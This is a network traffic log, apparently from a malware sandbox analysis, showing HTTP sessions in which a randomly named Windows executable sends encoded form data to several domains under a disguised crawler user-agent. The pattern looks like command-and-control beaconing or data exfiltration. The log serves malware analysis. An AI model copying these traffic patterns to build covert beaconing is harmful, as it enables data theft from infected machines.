Jan 11, 2025 02:45:00.586613894 CET	434	OUT	GET /xbnt/?EtJTX=_JVX4ryxDRQpLJF&cNPH=rqIPJyQOuOJXv4fbpZifam4NGQmFDlkIBDm/oxxW981wllDAxGsmTrFlhRhIH2nC7YG/ucdsY/agAUz7mNPlHSFHpTMESY5PIg2QQDYfpCfgaUZe3U6n0Vyz+dFy5VePm5+jk7AWmLgw HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.gern.dev Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 02:45:01.361834049 CET	275	IN	HTTP/1.1 403 date: Sat, 11 Jan 2025 01:44:54 GMT content-type: text/html content-length: 93 cache-control: no-cache x-cdn-cache-status: MISS x-via: ASH1 connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49978	176.57.65.76	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:45:06.520032883 CET	679	OUT	POST /fpja/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.newbh.pro Origin: http://www.newbh.pro Referer: http://www.newbh.pro/fpja/ Content-Length: 217 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 46 57 47 32 41 36 4a 7a 59 51 49 75 67 63 5a 32 57 76 43 62 6e 77 55 31 41 46 62 38 42 34 6e 47 4b 41 38 39 61 7a 39 76 37 34 79 4f 2b 48 6a 58 36 31 4c 72 4d 4e 59 44 74 47 31 55 30 79 51 74 6e 49 36 41 79 76 5a 52 72 72 62 71 71 49 51 66 4f 4e 37 4b 4f 42 49 41 36 2f 4a 52 41 47 43 53 53 4a 76 54 31 31 74 76 50 31 35 45 62 53 73 76 6d 2b 34 74 52 65 55 76 49 65 31 73 2f 32 71 6c 53 78 41 4e 31 32 6d 59 2f 51 2f 7a 43 48 4b 62 46 79 31 37 5a 69 4b 50 62 62 4f 4f 41 46 71 6f 47 62 44 58 6c 64 50 64 78 6e 56 44 56 6a 59 47 49 67 44 32 69 63 57 34 41 39 65 4b 51 55 33 73 6c 63 55 6f 5a 46 66 58 66 49 50 35 58 36 4e 6b 4b 51 3d 3d Data Ascii: cNPH=FWG2A6JzYQIugcZ2WvCbnwU1AFb8B4nGKA89az9v74yO+HjX61LrMNYDtG1U0yQtnI6AyvZRrrbqqIQfON7KOBIA6/JRAGCSSJvT11tvP15EbSsvm+4tReUvIe1s/2qlSxAN12mY/Q/zCHKbFy17ZiKPbbOOAFqoGbDXldPdxnVDVjYGIgD2icW4A9eKQU3slcUoZFfXfIP5X6NkKQ==
Jan 11, 2025 02:45:07.271292925 CET	914	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg8_=FlIrkQdPECMfqSfC; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 02:05:06 GMT Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 02:05:06 GMT Set-Cookie: __ddg10_=1736559906; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 02:05:06 GMT Set-Cookie: __ddg1_=PaWaBttD43FJaIrAKhpk; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 01:45:06 GMT date: Sat, 11 Jan 2025 01:45:07 GMT content-type: text/html; charset=iso-8859-1 content-length: 235 location: https://www.newbh.pro/fpja/ x-host: www.newbh.pro x-tilda-server: 26 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 66 70 6a 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/fpja/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49979	176.57.65.76	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:45:09.085612059 CET	699	OUT	POST /fpja/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.newbh.pro Origin: http://www.newbh.pro Referer: http://www.newbh.pro/fpja/ Content-Length: 237 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 46 57 47 32 41 36 4a 7a 59 51 49 75 6d 2f 52 32 56 4d 36 62 68 51 55 79 44 46 62 38 55 49 6e 43 4b 41 67 39 61 79 70 2f 37 4b 47 4f 77 48 54 58 37 30 4c 72 4e 4e 59 44 6c 6d 31 4d 70 69 51 32 6e 49 48 39 79 71 68 52 72 76 4c 71 71 4b 49 66 53 75 54 4a 63 68 49 43 79 66 4a 58 64 32 43 53 53 4a 76 54 31 31 35 4a 50 31 52 45 61 69 63 76 6e 61 73 73 4e 4f 55 73 65 4f 31 73 30 57 71 68 53 78 42 6f 31 33 36 68 2f 57 6a 7a 43 47 36 62 47 6a 31 30 43 79 4b 4a 47 72 50 62 4c 77 48 76 4b 4c 6a 31 67 73 44 6f 33 6d 68 69 64 31 5a 6b 53 43 50 61 38 4e 75 44 45 2f 36 38 48 79 71 5a 6e 64 51 77 55 6e 72 32 41 2f 71 54 61 6f 73 67 63 76 4e 4b 32 70 6f 72 6a 70 50 45 2f 62 55 34 33 59 51 49 70 39 63 3d Data Ascii: cNPH=FWG2A6JzYQIum/R2VM6bhQUyDFb8UInCKAg9ayp/7KGOwHTX70LrNNYDlm1MpiQ2nIH9yqhRrvLqqKIfSuTJchICyfJXd2CSSJvT115JP1REaicvnassNOUseO1s0WqhSxBo136h/WjzCG6bGj10CyKJGrPbLwHvKLj1gsDo3mhid1ZkSCPa8NuDE/68HyqZndQwUnr2A/qTaosgcvNK2porjpPE/bU43YQIp9c=
Jan 11, 2025 02:45:09.867124081 CET	1236	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg8_=ZK87HIrxgzE08ySX; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 02:05:09 GMT Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 02:05:09 GMT Set-Cookie: __ddg10_=1736559909; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 02:05:09 GMT Set-Cookie: __ddg1_=BWiRJX5Grscz6JoMBBEe; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 01:45:09 GMT date: Sat, 11 Jan 2025 01:45:09 GMT content-type: text/html; charset=iso-8859-1 content-length: 399 location: https://www.newbh.pro/fpja/?Nl2t=IUuWDP5KSR42idQ8V9eL5H4IAUuVA+zBaCctSylP56Crxmno30P/av4JsAs21D4yvOaE2KpIj83Zn/A/H7bRFCoBwYdtSkqfE87Ev09JJUQ5bSZyiLUvXvw/Q+xugWulPHUUz08=&hVf=LT3hw09hw4llR x-host: www.newbh.pro x-tilda-server: 9 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 66 70 6a 61 2f 3f 4e 6c 32 74 3d 49 55 75 57 44 50 35 4b 53 52 34 32 69 64 51 38 56 39 65 4c 35 48 34 49 41 55 75 56 41 2b 7a 42 61 43 63 74 53 79 6c 50 35 36 43 72 78 6d 6e 6f 33 30 50 2f 61 76 34 4a 73 41 73 32 31 44 34 79 76 4f 61 45 32 4b 70 49 6a 38 33 5a 6e 2f 41 2f 48 37 62 52 46 43 6f 42 77 59 64 74 53 6b 71 66 45 38 37 45 76 30 39 4a 4a 55 51 35 62 53 5a 79 69 4c 55 76 58 76 77 2f 51 2b 78 75 67 57 75 6c [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/fpja/?Nl2t=IUuWDP5KSR42idQ8V9eL5H4IAUuVA+zBaCctSylP56Crxmno30P/av4JsAs21D4yvOaE2KpIj83Zn/A/H7bRFCoBwYdtSkqfE87Ev09JJUQ5bSZyiLUvXvw/Q+xugWulPHUUz08=&hVf=LT3hw09hw4llR">here</a>.</p></body></html>
Jan 11, 2025 02:45:09.867182016 CET	1	IN	Data Raw: 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49980	176.57.65.76	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:45:11.629226923 CET	1712	OUT	POST /fpja/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.newbh.pro Origin: http://www.newbh.pro Referer: http://www.newbh.pro/fpja/ Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 46 57 47 32 41 36 4a 7a 59 51 49 75 6d 2f 52 32 56 4d 36 62 68 51 55 79 44 46 62 38 55 49 6e 43 4b 41 67 39 61 79 70 2f 37 4b 65 4f 77 30 62 58 36 54 66 72 66 39 59 44 6b 6d 31 50 70 69 51 33 6e 49 65 32 79 71 64 6e 72 74 44 71 72 76 63 66 43 66 54 4a 46 52 49 43 2b 2f 4a 53 41 47 44 61 53 4a 2f 58 31 31 70 4a 50 31 52 45 61 68 45 76 75 75 34 73 50 4f 55 76 49 65 31 6f 2f 32 72 32 53 78 5a 53 31 33 2b 78 2f 6c 37 7a 44 6d 71 62 45 52 64 30 4f 79 4b 4c 46 72 4f 59 4c 77 44 67 4b 49 58 35 67 73 32 46 33 6b 42 69 65 42 34 4f 49 77 50 58 67 76 6d 2b 4c 2b 61 65 4e 77 47 71 6c 76 6f 63 4c 47 7a 4c 46 49 36 4b 61 2b 49 41 53 5a 46 53 75 36 51 39 36 72 2f 30 2f 76 46 32 67 34 49 66 34 70 65 36 35 52 53 62 6a 78 32 6f 2f 62 71 52 6c 30 64 65 42 38 48 63 4e 71 4e 50 76 47 6d 6f 57 45 71 54 58 2f 36 74 66 34 69 38 32 69 39 55 57 42 34 2f 34 31 31 5a 30 47 70 37 37 53 66 46 32 76 69 5a 48 7a 4a 44 42 44 6f 38 36 47 44 55 4b 6a 2b 72 6d 56 37 65 30 2b 57 43 43 31 78 43 56 79 6c 36 4e 2f 33 2f 56 [TRUNCATED] Data Ascii: cNPH=FWG2A6JzYQIum/R2VM6bhQUyDFb8UInCKAg9ayp/7KeOw0bX6Tfrf9YDkm1PpiQ3nIe2yqdnrtDqrvcfCfTJFRIC+/JSAGDaSJ/X11pJP1REahEvuu4sPOUvIe1o/2r2SxZS13+x/l7zDmqbERd0OyKLFrOYLwDgKIX5gs2F3kBieB4OIwPXgvm+L+aeNwGqlvocLGzLFI6Ka+IASZFSu6Q96r/0/vF2g4If4pe65RSbjx2o/bqRl0deB8HcNqNPvGmoWEqTX/6tf4i82i9UWB4/411Z0Gp77SfF2viZHzJDBDo86GDUKj+rmV7e0+WCC1xCVyl6N/3/VLEnqm2Qy1pQY3bHTW29VfBGHQg6b0SHiM6oGKpLsrhzgvjJft9OtE/pJ5gU/xaTGm+gDR0mo38r4kEH7vhMJaaVNjr4ZAcBcpENbqiiCn98GfU7J+w8VQlQbujjXgSFnhidekJSs0BeYGvy8vc6qmDs1O6mHE+rWUsWOukbRHnLpsVTExo91ZIcw7GHHFjw+dyW1hnt3Q40r30KT5650wn5ROrIHL4KHX3jEAtMNvFgIpP+vgMKJeBW52DMJ718cQ8Q82kAKKiqobY/YQO7QlkLf8uXxBm5tIUohWHBIPP58bipUh5cnbg5VAUfdgEhIMiV84/7tioFD/3X1Bzj1rF2A3Xuqonf2sFzH7kMk/Wi1l9wPzuPP+ObGxyspZ057okvd3B71MJqavYwFAfveB8CaMbi3/yvLF//gvOO7Zmjk3ymKSkx2IHkQVVzrTq4Z7zao6PW5/43WGfvIseMV0eun8S1V1g1fX3LvFdhbfEXIDCGyhEpqxNzVOYZTfNEKHAvVWHACAvOmyBCzLrOeH+F+apxEE3sKMzzwlBLiafnSbJgMdgitbJyiteldsG7If52kzceVSiQhZGgg743cYnMeU11m+WfJmg1bOscx3G011A9qCuOOfXbxyUww5stPxzoiVUunqrNM2BfioLtAvX8s52O9N+W613 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49981	176.57.65.76	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:45:14.168349028 CET	435	OUT	GET /fpja/?cNPH=IUuWDP5KSR42idQ8XdSlo3kXCFzmA+zBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXcxME3uJuUkrEHMOi0EZXDVBAbjQv6uRKQsMrbusrwUvwXjFI0Eut13DQ&EtJTX=_JVX4ryxDRQpLJF HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.newbh.pro Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 02:45:14.819356918 CET	914	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg8_=VnmXafgsC09HAYeH; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 02:05:14 GMT Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 02:05:14 GMT Set-Cookie: __ddg10_=1736559914; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 02:05:14 GMT Set-Cookie: __ddg1_=ERPF15dnVzSIivBcD2AG; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 01:45:14 GMT date: Sat, 11 Jan 2025 01:45:14 GMT content-type: text/html; charset=iso-8859-1 content-length: 235 location: https://www.newbh.pro/fpja/ x-host: www.newbh.pro x-tilda-server: 15 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 66 70 6a 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/fpja/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49982	209.74.79.41	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:45:19.877793074 CET	688	OUT	POST /b0aw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.thinkone.xyz Origin: http://www.thinkone.xyz Referer: http://www.thinkone.xyz/b0aw/ Content-Length: 217 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 59 4d 47 59 75 52 61 68 39 6f 31 35 72 58 54 4b 53 72 51 54 44 59 4c 53 63 62 51 4a 58 57 71 6f 6d 41 53 72 53 38 74 71 72 59 4c 39 6d 39 34 70 5a 4d 56 63 76 73 55 67 47 53 45 75 4a 2f 77 54 54 38 35 31 49 74 49 49 47 6c 33 69 76 59 44 44 43 77 47 38 56 37 48 4e 4a 68 6b 43 71 4c 67 41 6c 71 74 38 42 66 68 64 59 61 36 51 79 63 71 6a 65 63 6f 6d 49 4b 71 48 71 38 5a 41 71 79 6d 4b 49 37 2f 59 6e 4e 70 79 30 49 6d 38 65 32 70 58 4b 6b 38 73 7a 41 4b 74 76 54 69 75 69 53 38 4d 75 4a 47 52 67 4b 62 67 75 6a 70 56 71 69 38 74 6a 4c 32 4d 4c 52 32 4b 44 45 55 45 51 71 41 34 39 42 69 2f 6f 75 36 48 4d 58 53 32 35 56 5a 6c 6c 67 3d 3d Data Ascii: cNPH=YMGYuRah9o15rXTKSrQTDYLScbQJXWqomASrS8tqrYL9m94pZMVcvsUgGSEuJ/wTT851ItIIGl3ivYDDCwG8V7HNJhkCqLgAlqt8BfhdYa6QycqjecomIKqHq8ZAqymKI7/YnNpy0Im8e2pXKk8szAKtvTiuiS8MuJGRgKbgujpVqi8tjL2MLR2KDEUEQqA49Bi/ou6HMXS25VZllg==
Jan 11, 2025 02:45:20.438476086 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 01:45:20 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49983	209.74.79.41	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:45:22.428251982 CET	708	OUT	POST /b0aw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.thinkone.xyz Origin: http://www.thinkone.xyz Referer: http://www.thinkone.xyz/b0aw/ Content-Length: 237 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 59 4d 47 59 75 52 61 68 39 6f 31 35 70 30 37 4b 51 4b 51 54 55 6f 4c 54 54 37 51 4a 42 6d 71 6b 6d 41 57 72 53 2f 68 63 6f 72 76 39 6d 5a 30 70 59 4e 56 63 73 73 55 67 54 69 45 76 4b 50 77 59 54 38 30 43 49 76 63 49 47 6b 54 69 76 5a 7a 44 44 48 53 7a 58 72 48 50 46 42 6b 4d 67 72 67 41 6c 71 74 38 42 66 6c 7a 59 65 57 51 79 70 36 6a 66 39 6f 35 45 71 71 47 6a 63 5a 41 39 69 6d 4f 49 37 2f 36 6e 49 77 70 30 4b 75 38 65 7a 56 58 4a 77 49 72 71 77 4b 76 69 7a 6a 64 6e 51 42 51 75 63 6d 51 71 6f 71 34 76 54 70 71 76 55 39 50 35 70 36 67 56 41 4f 78 48 47 77 79 48 4d 64 4e 2f 41 6d 6e 6c 4d 4f 6d 54 67 33 63 30 48 34 68 7a 58 4e 62 38 63 43 68 62 37 49 77 72 78 45 37 38 58 45 77 69 79 77 3d Data Ascii: cNPH=YMGYuRah9o15p07KQKQTUoLTT7QJBmqkmAWrS/hcorv9mZ0pYNVcssUgTiEvKPwYT80CIvcIGkTivZzDDHSzXrHPFBkMgrgAlqt8BflzYeWQyp6jf9o5EqqGjcZA9imOI7/6nIwp0Ku8ezVXJwIrqwKvizjdnQBQucmQqoq4vTpqvU9P5p6gVAOxHGwyHMdN/AmnlMOmTg3c0H4hzXNb8cChb7IwrxE78XEwiyw=
Jan 11, 2025 02:45:23.013930082 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 01:45:22 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49984	209.74.79.41	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:45:24.972147942 CET	1721	OUT	POST /b0aw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.thinkone.xyz Origin: http://www.thinkone.xyz Referer: http://www.thinkone.xyz/b0aw/ Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 59 4d 47 59 75 52 61 68 39 6f 31 35 70 30 37 4b 51 4b 51 54 55 6f 4c 54 54 37 51 4a 42 6d 71 6b 6d 41 57 72 53 2f 68 63 6f 72 6e 39 6e 71 38 70 5a 75 74 63 74 73 55 67 50 79 45 79 4b 50 77 2f 54 2f 45 47 49 76 67 59 47 6e 37 69 70 4b 72 44 4b 57 53 7a 64 72 48 50 61 78 6b 4e 71 4c 67 56 6c 70 56 77 42 66 31 7a 59 65 57 51 79 75 43 6a 59 73 6f 35 47 71 71 48 71 38 5a 4d 71 79 6d 71 49 37 6e 41 6e 49 39 63 30 61 4f 38 5a 54 6c 58 47 6a 67 72 6a 77 4b 78 73 54 6a 46 6e 51 4e 35 75 63 54 70 71 74 2f 56 76 55 6c 71 74 46 4a 58 69 72 75 76 57 69 43 45 4f 57 35 55 58 61 4a 37 34 41 6a 52 